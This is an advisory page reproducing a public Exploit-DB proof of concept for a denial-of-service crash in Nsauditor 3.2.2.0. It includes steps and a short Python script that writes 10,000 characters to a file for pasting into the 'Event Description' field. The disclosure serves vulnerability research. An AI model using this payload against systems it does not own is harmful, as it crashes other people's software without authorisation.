Vendor: Nsauditor
By: Ismael Nava
CVSS: 7.5 (HIGH)
Type: Denial of Service
CWE: 400
Product Name: Nsauditor
Affected Version From: 3.2.2.0
Affected Version To: 3.2.2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:nsauditor:nsauditor
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Home x64
2021

Nsauditor 3.2.2.0 – ‘Event Description’ Denial of Service (PoC)

Nsauditor 3.2.2.0 is vulnerable to a denial of service attack when a malicious user sends a large amount of data to the 'Event Description' field. This can be exploited by a remote attacker to crash the application.

Mitigation:

Ensure that the application is configured to limit the size of data that can be sent to the 'Event Description' field.

Exploit-DB raw data:

# Exploit Title: Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)
# Date: 2021-02-15
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.nsauditor.com/
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Version: 3.2.2.0
# Tested on: Windows 10 Home x64


#STEPS
# Open the program Nsauditor
# In Options select Configuration...
# Click on Security Events
# Run the Python exploit script; it will create a new .txt file
# Copy the content of the file "Liella.txt"
# Paste the content into the Event Description field and click Add Event
# End :)


buffer = 'U' * 10000

try:
    # Write the 10,000-character payload to Liella.txt
    with open("Liella.txt", "w") as file:
        file.write(buffer)

    print("Archive ready")
except OSError:
    print("Archive not ready")